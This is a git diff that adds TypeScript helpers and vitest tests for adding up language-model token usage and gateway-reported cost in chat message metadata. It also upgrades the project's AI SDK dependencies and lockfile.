+export interface GatewayProviderMetadata {
+  gateway: {
+    cost?: string;
+    marketCost?: string;
+    inferenceCost?: string;
+    inputInferenceCost?: string;
+    outputInferenceCost?: string;
+    generationId?: string;
+  };
+}
diff --git a/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
new file mode 100644
index 000000000..4ba0b0234
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
@@ -0,0 +1,49 @@
+import { describe, it, expect } from "vitest";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+
+describe("addLanguageModelUsage", () => {
+  it("sums basic input/output/total tokens", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50, totalTokens: 150 },
+      { inputTokens: 200, outputTokens: 75, totalTokens: 275 },
+    );
+    expect(result.inputTokens).toBe(300);
+    expect(result.outputTokens).toBe(125);
+    expect(result.totalTokens).toBe(425);
+  });
+
+  it("sums nested cache token details", () => {
+    const result = addLanguageModelUsage(
+      {
+        inputTokens: 100,
+        outputTokens: 50,
+        inputTokenDetails: { cacheReadTokens: 10, cacheWriteTokens: 5, noCacheTokens: 85 },
+      } as never,
+      {
+        inputTokens: 200,
+        outputTokens: 75,
+        inputTokenDetails: { cacheReadTokens: 20, cacheWriteTokens: 15, noCacheTokens: 165 },
+      } as never,
+    );
+    expect(result.inputTokenDetails?.cacheReadTokens).toBe(30);
+    expect(result.inputTokenDetails?.cacheWriteTokens).toBe(20);
+    expect(result.inputTokenDetails?.noCacheTokens).toBe(250);
+  });
+
+  it("returns undefined for fields missing on both inputs", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100 } as never,
+      { inputTokens: 200 } as never,
+    );
+    expect(result.outputTokens).toBeUndefined();
+    expect(result.totalTokens).toBeUndefined();
+  });
+
+  it("treats missing field on one side as 0", () => {
+    const result = addLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50 } as never,
+      { inputTokens: 200 } as never,
+    );
+    expect(result.outputTokens).toBe(50);
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
new file mode 100644
index 000000000..b0c449c0c
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
@@ -0,0 +1,27 @@
+import { describe, it, expect } from "vitest";
+import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts";
+
+describe("addTokenCounts", () => {
+  it("returns undefined when both inputs are undefined", () => {
+    expect(addTokenCounts(undefined, undefined)).toBeUndefined();
+  });
+
+  it("returns undefined when both inputs are null", () => {
+    expect(addTokenCounts(null as never, null as never)).toBeUndefined();
+  });
+
+  it("sums two numbers", () => {
+    expect(addTokenCounts(100, 50)).toBe(150);
+  });
+
+  it("treats undefined on one side as 0", () => {
+    expect(addTokenCounts(100, undefined)).toBe(100);
+    expect(addTokenCounts(undefined, 50)).toBe(50);
+  });
+
+  it("handles zero correctly (not confused with undefined)", () => {
+    expect(addTokenCounts(0, 50)).toBe(50);
+    expect(addTokenCounts(0, 0)).toBe(0);
+    expect(addTokenCounts(0, undefined)).toBe(0);
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
new file mode 100644
index 000000000..7afd14e00
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
@@ -0,0 +1,93 @@
+import { describe, it, expect } from "vitest";
+import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
+
+const MODEL_ID = "anthropic/claude-haiku-4.5";
+
+// `ai@^6.0.190` uses the flat LanguageModelUsage shape — same as the
+// open-agents UI consumes — so the callback passes usage through
+// without any shape conversion.
+function finishStepPart(opts: {
+  inputTokens?: number;
+  outputTokens?: number;
+  cost?: string;
+  finishReason?: string;
+}) {
+  const inputTokens = opts.inputTokens ?? 100;
+  const outputTokens = opts.outputTokens ?? 50;
+  return {
+    type: "finish-step",
+    usage: {
+      inputTokens,
+      outputTokens,
+      totalTokens: inputTokens + outputTokens,
+      inputTokenDetails: {
+        noCacheTokens: inputTokens,
+        cacheReadTokens: undefined,
+        cacheWriteTokens: undefined,
+      },
+      outputTokenDetails: {
+        textTokens: outputTokens,
+        reasoningTokens: undefined,
+      },
+    },
+    providerMetadata: opts.cost ? { gateway: { cost: opts.cost } } : undefined,
+    finishReason: opts.finishReason ?? "tool-calls",
+  } as never;
+}
+
+describe("buildMessageMetadataCallback", () => {
+  it("returns undefined for non-finish-step parts (start, text-delta, tool-call, etc.)", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    expect(cb({ part: { type: "text-delta", delta: "hi" } as never })).toBeUndefined();
+    expect(cb({ part: { type: "start" } as never })).toBeUndefined();
+    expect(cb({ part: { type: "tool-call", toolName: "bash" } as never })).toBeUndefined();
+  });
+
+  it("emits modelId + selectedModelId + usage on the first finish-step", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50 }) });
+    expect(meta).toMatchObject({
+      modelId: MODEL_ID,
+      selectedModelId: MODEL_ID,
+      lastStepUsage: { inputTokens: 100, outputTokens: 50 },
+      totalMessageUsage: { inputTokens: 100, outputTokens: 50 },
+    });
+  });
+
+  it("emits cost when the gateway provider metadata includes it", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({ cost: "0.025" }) });
+    expect(meta).toMatchObject({ lastStepCost: 0.025, totalMessageCost: 0.025 });
+  });
+
+  it("omits cost fields when the gateway did not report one", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    const meta = cb({ part: finishStepPart({}) }) as Record<string, unknown>;
+    expect(meta.lastStepCost).toBeUndefined();
+    expect(meta.totalMessageCost).toBeUndefined();
+  });
+
+  it("accumulates usage AND cost across multiple finish-step calls", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50, cost: "0.01" }) });
+    const meta = cb({
+      part: finishStepPart({ inputTokens: 200, outputTokens: 75, cost: "0.03" }),
+    });
+    expect(meta).toMatchObject({
+      lastStepUsage: { inputTokens: 200, outputTokens: 75 },
+      totalMessageUsage: { inputTokens: 300, outputTokens: 125 },
+      lastStepCost: 0.03,
+      totalMessageCost: 0.04,
+    });
+  });
+
+  it("records lastStepFinishReason and stepFinishReasons history", () => {
+    const cb = buildMessageMetadataCallback({ modelId: MODEL_ID });
+    cb({ part: finishStepPart({ finishReason: "tool-calls" }) });
+    const meta = cb({ part: finishStepPart({ finishReason: "stop" }) });
+    expect(meta).toMatchObject({
+      lastStepFinishReason: "stop",
+      stepFinishReasons: [{ finishReason: "tool-calls" }, { finishReason: "stop" }],
+    });
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
new file mode 100644
index 000000000..d1c678914
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
@@ -0,0 +1,28 @@
+import { describe, it, expect } from "vitest";
+import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost";
+
+describe("extractGatewayCost", () => {
+  it("returns undefined when providerMetadata is missing", () => {
+    expect(extractGatewayCost(undefined)).toBeUndefined();
+  });
+
+  it("returns undefined when there is no `gateway` namespace", () => {
+    expect(extractGatewayCost({ openai: { foo: "bar" } } as never)).toBeUndefined();
+  });
+
+  it("returns undefined when `gateway.cost` is missing", () => {
+    expect(extractGatewayCost({ gateway: {} } as never)).toBeUndefined();
+  });
+
+  it("parses a numeric string cost", () => {
+    expect(extractGatewayCost({ gateway: { cost: "0.0420" } } as never)).toBe(0.042);
+  });
+
+  it("returns undefined when cost is non-numeric", () => {
+    expect(extractGatewayCost({ gateway: { cost: "not-a-number" } } as never)).toBeUndefined();
+  });
+
+  it("returns undefined when cost is a number (gateway should send strings)", () => {
+    expect(extractGatewayCost({ gateway: { cost: 0.05 } } as never)).toBeUndefined();
+  });
+});
diff --git a/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
new file mode 100644
index 000000000..c2c24f64f
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
@@ -0,0 +1,25 @@
+import { describe, it, expect } from "vitest";
+import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape";
+
+describe("hasGatewayShape", () => {
+  it("returns false for undefined metadata", () => {
+    expect(hasGatewayShape(undefined)).toBe(false);
+  });
+
+  it("returns false when there is no `gateway` namespace", () => {
+    expect(hasGatewayShape({ openai: { foo: "bar" } } as never)).toBe(false);
+  });
+
+  it("returns false when `gateway` is null", () => {
+    expect(hasGatewayShape({ gateway: null } as never)).toBe(false);
+  });
+
+  it("returns false when `gateway` is a string (not an object)", () => {
+    expect(hasGatewayShape({ gateway: "oops" } as never)).toBe(false);
+  });
+
+  it("returns true when `gateway` is an object (even empty)", () => {
+    expect(hasGatewayShape({ gateway: {} } as never)).toBe(true);
+    expect(hasGatewayShape({ gateway: { cost: "0.05" } } as never)).toBe(true);
+  });
+});
diff --git a/lib/agent/messageMetadata/addLanguageModelUsage.ts b/lib/agent/messageMetadata/addLanguageModelUsage.ts
new file mode 100644
index 000000000..4a676364f
--- /dev/null
+++ b/lib/agent/messageMetadata/addLanguageModelUsage.ts
@@ -0,0 +1,49 @@
+import type { LanguageModelUsage } from "ai";
+import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts";
+
+/**
+ * Pointwise-sum two `LanguageModelUsage` records (the flat shape used by
+ * `ai@^6.0.190`). Mirrors `packages/agent/usage.ts:addLanguageModelUsage`
+ * in the open-agents source. Used to accumulate per-step usage into a
+ * per-message total inside the `messageMetadata` callback.
+ *
+ * Returns `undefined` for fields that are missing on BOTH inputs, so
+ * the resulting usage object stays sparse rather than introducing
+ * spurious zeros.
+ */
+export function addLanguageModelUsage(
+  a: LanguageModelUsage,
+  b: LanguageModelUsage,
+): LanguageModelUsage {
+  return {
+    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
+    inputTokenDetails: {
+      noCacheTokens: addTokenCounts(
+        a.inputTokenDetails?.noCacheTokens,
+        b.inputTokenDetails?.noCacheTokens,
+      ),
+      cacheReadTokens: addTokenCounts(
+        a.inputTokenDetails?.cacheReadTokens,
+        b.inputTokenDetails?.cacheReadTokens,
+      ),
+      cacheWriteTokens: addTokenCounts(
+        a.inputTokenDetails?.cacheWriteTokens,
+        b.inputTokenDetails?.cacheWriteTokens,
+      ),
+    },
+    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
+    outputTokenDetails: {
+      textTokens: addTokenCounts(
+        a.outputTokenDetails?.textTokens,
+        b.outputTokenDetails?.textTokens,
+      ),
+      reasoningTokens: addTokenCounts(
+        a.outputTokenDetails?.reasoningTokens,
+        b.outputTokenDetails?.reasoningTokens,
+      ),
+    },
+    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
+    reasoningTokens: addTokenCounts(a.reasoningTokens, b.reasoningTokens),
+    cachedInputTokens: addTokenCounts(a.cachedInputTokens, b.cachedInputTokens),
+  };
+}
diff --git a/lib/agent/messageMetadata/addTokenCounts.ts b/lib/agent/messageMetadata/addTokenCounts.ts
new file mode 100644
index 000000000..354a79f32
--- /dev/null
+++ b/lib/agent/messageMetadata/addTokenCounts.ts
@@ -0,0 +1,13 @@
+/**
+ * Pointwise-sum two `number | undefined` token counts. Returns
+ * `undefined` only when BOTH inputs are missing — so sparse usage
+ * records (where the provider only reported some fields) stay sparse
+ * after summation instead of introducing spurious zeros.
+ *
+ * Mirrors open-agents' internal `addTokenCounts` helper inside
+ * `packages/agent/usage.ts`.
+ */
+export function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined {
+  if (a == null && b == null) return undefined;
+  return (a ?? 0) + (b ?? 0);
+}
diff --git a/lib/agent/messageMetadata/buildMessageMetadataCallback.ts b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts
new file mode 100644
index 000000000..07225fd6a
--- /dev/null
+++ b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts
@@ -0,0 +1,81 @@
+import type { LanguageModelUsage, TextStreamPart, ToolSet } from "ai";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost";
+import type { AgentMessageMetadata } from "@/lib/agent/messageMetadata/AgentMessageMetadata";
+import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata";
+
+/**
+ * Build a stateful `messageMetadata` callback for `toUIMessageStream`.
+ * Accumulates per-step usage + cost across an assistant turn and emits
+ * the running totals on every `finish-step` part. Non-finish parts
+ * return `undefined` (AI SDK skips emission).
+ *
+ * Mirrors open-agents' `apps/web/app/workflows/chat.ts` callback shape
+ * so sandbox.recoupable.com's UI can render model/cost/usage badges
+ * when cut over to api's `/api/chat/workflow`. api and open-agents now
+ * share the same `ai@^6.0.190` shape for `LanguageModelUsage`, so no
+ * shape conversion happens here.
+ *
+ * Each call to `buildMessageMetadataCallback` returns a FRESH closure —
+ * one per assistant turn — so totals reset between turns.
+ */
+export function buildMessageMetadataCallback(opts: { modelId: string }) {
+  let lastStepUsage: LanguageModelUsage | undefined;
+  let totalMessageUsage: LanguageModelUsage | undefined;
+  let lastStepCost: number | undefined;
+  let totalMessageCost: number | undefined;
+  let stepFinishReasons: AgentStepFinishMetadata[] = [];
+
+  return function messageMetadata({
+    part,
+  }: {
+    part: TextStreamPart<ToolSet>;
+  }): AgentMessageMetadata | undefined {
+    if (part.type !== "finish-step") return undefined;
+
+    const finishPart = part as TextStreamPart<ToolSet> & {
+      usage?: LanguageModelUsage;
+      providerMetadata?: Parameters<typeof extractGatewayCost>[0];
+      finishReason?: AgentStepFinishMetadata["finishReason"];
+      rawFinishReason?: string;
+    };
+
+    if (finishPart.usage) {
+      lastStepUsage = finishPart.usage;
+      totalMessageUsage = totalMessageUsage
+        ? addLanguageModelUsage(totalMessageUsage, finishPart.usage)
+        : finishPart.usage;
+    }
+
+    const stepCost = extractGatewayCost(finishPart.providerMetadata);
+    if (stepCost !== undefined) {
+      lastStepCost = stepCost;
+      totalMessageCost = (totalMessageCost ?? 0) + stepCost;
+    }
+
+    if (finishPart.finishReason) {
+      stepFinishReasons = [
+        ...stepFinishReasons,
+        {
+          finishReason: finishPart.finishReason,
+          rawFinishReason: finishPart.rawFinishReason,
+        },
+      ];
+    }
+
+    return {
+      // `selectedModelId` and `modelId` are equal in api today (no
+      // gateway fallback routing exposed) — emit both for shape
+      // parity with open-agents' WebAgentMessageMetadata.
+      selectedModelId: opts.modelId,
+      modelId: opts.modelId,
+      lastStepUsage,
+      totalMessageUsage,
+      lastStepCost,
+      totalMessageCost,
+      lastStepFinishReason: finishPart.finishReason,
+      lastStepRawFinishReason: finishPart.rawFinishReason,
+      stepFinishReasons,
+    };
+  };
+}
diff --git a/lib/agent/messageMetadata/extractGatewayCost.ts b/lib/agent/messageMetadata/extractGatewayCost.ts
new file mode 100644
index 000000000..42ef13f63
--- /dev/null
+++ b/lib/agent/messageMetadata/extractGatewayCost.ts
@@ -0,0 +1,20 @@
+import type { ProviderMetadata } from "ai";
+import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape";
+
+/**
+ * Extract the gateway-reported cost for a single step.
+ * Returns `undefined` when the step did not go through the gateway,
+ * the gateway did not attach a cost (e.g. direct provider call), or
+ * the cost is malformed.
+ *
+ * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`.
+ */
+export function extractGatewayCost(
+  providerMetadata: ProviderMetadata | undefined,
+): number | undefined {
+  if (!hasGatewayShape(providerMetadata)) return undefined;
+  const rawCost = providerMetadata.gateway.cost;
+  if (typeof rawCost !== "string") return undefined;
+  const cost = Number.parseFloat(rawCost);
+  return Number.isFinite(cost) ? cost : undefined;
+}
diff --git a/lib/agent/messageMetadata/hasGatewayShape.ts b/lib/agent/messageMetadata/hasGatewayShape.ts
new file mode 100644
index 000000000..db322c8e7
--- /dev/null
+++ b/lib/agent/messageMetadata/hasGatewayShape.ts
@@ -0,0 +1,18 @@
+import type { ProviderMetadata } from "ai";
+import type { GatewayProviderMetadata } from "@/lib/agent/messageMetadata/GatewayProviderMetadata";
+
+/**
+ * Type guard for the Vercel AI Gateway entry inside a step's
+ * `providerMetadata`. Returns true when the metadata has a non-null
+ * `gateway` object (cost may still be absent). Splitting this out from
+ * `extractGatewayCost` keeps each file to a single responsibility and
+ * makes the guard reusable when other gateway fields (e.g.
+ * `inferenceCost`) get plumbed through later.
+ */
+export function hasGatewayShape(
+  metadata: ProviderMetadata | undefined,
+): metadata is ProviderMetadata & GatewayProviderMetadata {
+  if (!metadata) return false;
+  const gateway = (metadata as Record<string, unknown>).gateway;
+  return typeof gateway === "object" && gateway !== null;
+}
diff --git a/lib/chat/setupChatRequest.ts b/lib/chat/setupChatRequest.ts
index f88654de3..949ca29cb 100644
--- a/lib/chat/setupChatRequest.ts
+++ b/lib/chat/setupChatRequest.ts
@@ -18,10 +18,12 @@ import getGeneralAgent from "@/lib/agents/generalAgent/getGeneralAgent";
 export async function setupChatRequest(body: ChatRequestBody): Promise<ChatConfig> {
   const decision = await getGeneralAgent(body);
 
-  const convertedMessages = convertToModelMessages(body.messages, {
-    tools: decision.agent.tools,
-    ignoreIncompleteToolCalls: true,
-  }).slice(-MAX_MESSAGES);
+  const convertedMessages = (
+    await convertToModelMessages(body.messages, {
+      tools: decision.agent.tools,
+      ignoreIncompleteToolCalls: true,
+    })
+  ).slice(-MAX_MESSAGES);
 
   return {
     agent: decision.agent,
diff --git a/package.json b/package.json
index 4b5a23bc0..f2d1ba03a 100644
--- a/package.json
+++ b/package.json
@@ -17,11 +17,11 @@
     "eval": "braintrust eval --external-packages playwright playwright-core chromium-bidi @browserbasehq/stagehand @composio/core @composio/vercel"
   },
   "dependencies": {
-    "@ai-sdk/anthropic": "^3.0.13",
-    "@ai-sdk/gateway": "2.0.83",
-    "@ai-sdk/google": "^3.0.8",
-    "@ai-sdk/mcp": "^0.0.12",
-    "@ai-sdk/openai": "^3.0.10",
+    "@ai-sdk/anthropic": "^3.0.78",
+    "@ai-sdk/gateway": "3.0.119",
+    "@ai-sdk/google": "^3.0.79",
+    "@ai-sdk/mcp": "^1.0.43",
+    "@ai-sdk/openai": "^3.0.65",
     "@chat-adapter/github": "^4.15.0",
     "@chat-adapter/slack": "^4.15.0",
     "@chat-adapter/state-ioredis": "^4.15.0",
@@ -37,7 +37,7 @@
     "@trigger.dev/sdk": "^4.4.3",
     "@vercel/blob": "^2.3.1",
     "@vercel/sandbox": "2.0.0-beta.11",
-    "ai": "6.0.0-beta.122",
+    "ai": "6.0.190",
     "apify-client": "^2.20.0",
     "arweave": "^1.15.7",
     "autoevals": "^0.0.129",
diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
index eee3c93c9..7b4a331ad 100644
--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -9,20 +9,20 @@ importers:
   .:
     dependencies:
       '@ai-sdk/anthropic':
-        specifier: ^3.0.13
-        version: 3.0.13(zod@4.1.13)
+        specifier: ^3.0.78
+        version: 3.0.78(zod@4.1.13)
       '@ai-sdk/gateway':
-        specifier: 2.0.83
-        version: 2.0.83(zod@4.1.13)
+        specifier: 3.0.119
+        version: 3.0.119(zod@4.1.13)
       '@ai-sdk/google':
-        specifier: ^3.0.8
-        version: 3.0.8(zod@4.1.13)
+        specifier: ^3.0.79
+        version: 3.0.79(zod@4.1.13)
       '@ai-sdk/mcp':
-        specifier: ^0.0.12
-        version: 0.0.12(zod@4.1.13)
+        specifier: ^1.0.43
+        version: 1.0.43(zod@4.1.13)
       '@ai-sdk/openai':
-        specifier: ^3.0.10
-        version: 3.0.10(zod@4.1.13)
+        specifier: ^3.0.65
+        version: 3.0.65(zod@4.1.13)
       '@chat-adapter/github':
         specifier: ^4.15.0
         version: 4.15.0
@@ -46,7 +46,7 @@ importers:
         version: 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13)
       '@composio/vercel':
         specifier: ^0.3.4
-        version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))
+        version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))
       '@fal-ai/client':
         specifier: ^1.9.5
         version: 1.9.5
@@ -61,7 +61,7 @@ importers:
         version: 2.86.0(bufferutil@4.0.9)(utf-8-validate@5.0.10)
       '@trigger.dev/sdk':
         specifier: ^4.4.3
-        version: 4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)
+        version: 4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)
       '@vercel/blob':
         specifier: ^2.3.1
         version: 2.3.1
@@ -69,8 +69,8 @@ importers:
         specifier: 2.0.0-beta.11
         version: 2.0.0-beta.11
       ai:
-        specifier: 6.0.0-beta.122
-        version: 6.0.0-beta.122(zod@4.1.13)
+        specifier: 6.0.190
+        version: 6.0.190(zod@4.1.13)
       apify-client:
         specifier: ^2.20.0
         version: 2.20.0
@@ -204,72 +204,38 @@ packages:
   '@adraffy/ens-normalize@1.11.1':
     resolution: {integrity: sha512-nhCBV3quEgesuf7c7KYfperqSS14T8bYuvJ8PcLJp6znkZpFc0AuW4qBtr8eKVyPPe/8RSr7sglCWPU5eaxwKQ==}
 
-  '@ai-sdk/anthropic@3.0.13':
-    resolution: {integrity: sha512-62UqSpZWuR8pU2ZLc1IgPYiNdH01blAcaNEjrQtx4wCN7L2fUTXm/iG6Tq9qRCiRED+8eQ43olggbf0fbguqkA==}
+  '@ai-sdk/anthropic@3.0.78':
+    resolution: {integrity: sha512-0OY12G20cUt6iU6htpEA1491Oz++NVxZxlmWGX4B7rSbeZ5pnDmOu6YtW9BKzdZlNx5Gn23i6WMxyZFoMKNcgA==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/gateway@2.0.0-beta.66':
-    resolution: {integrity: sha512-9H4Y4pFcTlDqLOjhJNfHVJrmQiGGqzQLIDNKSGhab90KYgeZc7NouQF752jUIlEZCY1S4QynuUKISTUsKR6Qjg==}
+  '@ai-sdk/gateway@3.0.119':
+    resolution: {integrity: sha512-VAhfRWC+JexZakkVfmjaJKaTj00x7/UHdE8kMWL3NhuQAlf8oXtg9r4dfvFZrByXxchGRBvYE3biEUyibkg0xg==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/gateway@2.0.83':
-    resolution: {integrity: sha512-qgxu2++9tJTPZtC+VGczu21YNXTtzfrLQunqh7xcCaWSogAluchrGiKFS3IZkX7Se9dEt1yYZ6+d+cGo4cko6Q==}
+  '@ai-sdk/google@3.0.79':
+    resolution: {integrity: sha512-QWVAvYeA7JzEX2wkSyXOWv/I9PD9kvTzdykkSTLi+Eu8RyJ6gA0tdPIGa8esEtOcHE//G5vy6FTB70qQw8l/uw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/google@3.0.8':
-    resolution: {integrity: sha512-HiDetkn01f8ibcu6atygkPXsy6YgNA2uNz2bwgn6xHQQB1FsCCjDo8ylPA2EvaUbNypmD7oPj0zObDgwfE25Ug==}
+  '@ai-sdk/mcp@1.0.43':
+    resolution: {integrity: sha512-HdDMeyCcfIn5tW/P1kJ+BmYP8vfY8vppRn7swbVNRcLeFz/cpwik+B+C49Up4u5scRAcATtRJywOa7/rA4BmIA==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/mcp@0.0.12':
-    resolution: {integrity: sha512-hyf31U2CmgGexqOLgLfno525pjbqidJLu9pU+XcEwW/PkMcfTFuRq1iD3wbqtAmURRW0qJITiKV+in1B4I23gA==}
+  '@ai-sdk/openai@3.0.65':
+    resolution: {integrity: sha512-ZlVoWH+zrdiYDiUt6n/xvfCsk33mzsB81TUQkBRVx79rxU1FKZqVH9J/QCtEpSLqx0cUzjvtIw9l9p7EbUv+dw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
 
-  '@ai-sdk/openai@3.0.10':
-    resolution: {integrity: sha512-G6HJORN0rKuCFrqIUiYchjl2b4UjzKvv3VcNuW7xwQIdI8EcdB9Pr8ZaR9nEImK9E639nM8gCfvFEUM1xwGaCA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@3.0.19':
-    resolution: {integrity: sha512-W41Wc9/jbUVXVwCN/7bWa4IKe8MtxO3EyA0Hfhx6grnmiYlCvpI8neSYWFE0zScXJkgA/YK3BRybzgyiXuu6JA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@3.0.24':
-    resolution: {integrity: sha512-Zq6olgYvpMgfstQNpDwgqDC2wBEE+OnMnMuq4JyIu+aWjL8JJl+6u1sbKJNPxASErWrRlmOPIkat2fHiN4puhA==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      zod: ^3.25.76 || ^4.1.8
-
-  '@ai-sdk/provider-utils@4.0.0-beta.38':
-    resolution: {integrity: sha512-m1klVKT8KntgEIxHnSGEzdhdn48Uf/w6fe5rPWGnpTd+P532mADV7BC4txNYp40ziS5Z9VV1g1wn2xRScwEeRw==}
-    engines: {node: '>=18'}
-    peerDependencies:
-      '@valibot/to-json-schema': ^1.3.0
-      arktype: ^2.1.22
-      effect: ^3.18.4
-      zod: ^3.25.76 || ^4.1.8
-    peerDependenciesMeta:
-      '@valibot/to-json-schema':
-        optional: true
-      arktype:
-        optional: true
-      effect:
-        optional: true
-
-  '@ai-sdk/provider-utils@4.0.6':
-    resolution: {integrity: sha512-o/SP1GQOrpXAzHjMosPHI0Pu+YkwxIMndSjSLrEXtcVixdrjqrGaA9I7xJcWf+XpRFJ9byPHrKYnprwS+36gMg==}
+  '@ai-sdk/provider-utils@4.0.27':
+    resolution: {integrity: sha512-ubkAJ+xODouwtmN1tYlvTPphH1hPOBfZaEQe8U7skGvFAnIRs9PPpsq57bC2+Ky/MB4yzhd6YOsxTAx9sGpazw==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -278,20 +244,8 @@ packages:
     resolution: {integrity: sha512-qZMxYJ0qqX/RfnuIaab+zp8UAeJn/ygXXAffR5I4N0n1IrvA6qBsjc8hXLmBiMV2zoXlifkacF7sEFnYnjBcqg==}
     engines: {node: '>=18'}
 
-  '@ai-sdk/provider@2.0.0':
-    resolution: {integrity: sha512-6o7Y2SeO9vFKB8lArHXehNuusnpddKPk7xqL7T2/b+OvXMRIXUO1rR4wcv1hAFUAT9avGZshty3Wlua/XA7TvA==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@2.0.2':
-    resolution: {integrity: sha512-Epf0oKdUxNRK97Qm4l/Sp05TnwzE8FsyRF5p6nncOp8zH0GTuwK2uZoyzE/3uVjRdZNLyQ6Jw/SBjlOScMQy1Q==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@3.0.0-beta.20':
-    resolution: {integrity: sha512-+JqXbqHHtucRsMFGidygRyftpjX1GD2r4cG3Sh2URZ6g8IaN8k4loXNh2gX92dd4YjlYYn3eTHp3R8dDJfX25Q==}
-    engines: {node: '>=18'}
-
-  '@ai-sdk/provider@3.0.3':
-    resolution: {integrity: sha512-qGPYdoAuECaUXPrrz0BPX1SacZQuJ6zky0aakxpW89QW1hrY0eF4gcFm/3L9Pk8C5Fwe+RvBf2z7ZjDhaPjnlg==}
+  '@ai-sdk/provider@3.0.10':
+    resolution: {integrity: sha512-Q3BZ27qfpYqnCYGvE3vt+Qi6LGOF9R5Nmzn+9JoM1lCRsD9mYaIhfJLkSunN48nfGXJ6n+XNV0J/XVpqGQl7Dw==}
     engines: {node: '>=18'}
 
   '@alloc/quick-lru@5.2.0':
@@ -3252,14 +3206,6 @@ packages:
       '@aws-sdk/credential-provider-web-identity':
         optional: true
 
-  '@vercel/oidc@3.0.5':
-    resolution: {integrity: sha512-fnYhv671l+eTTp48gB4zEsTW/YtRgRPnkI2nT7x6qw5rkI1Lq2hTmQIpHPgyThI0znLK+vX2n9XxKdXZ7BUbbw==}
-    engines: {node: '>= 20'}
-
-  '@vercel/oidc@3.1.0':
-    resolution: {integrity: sha512-Fw28YZpRnA3cAHHDlkt7xQHiJ0fcL+NRcIqsocZQUSmbzeIKRpwttJjik5ZGanXP+vlA4SbTg+AbA3bP363l+w==}
-    engines: {node: '>= 20'}
-
   '@vercel/oidc@3.2.0':
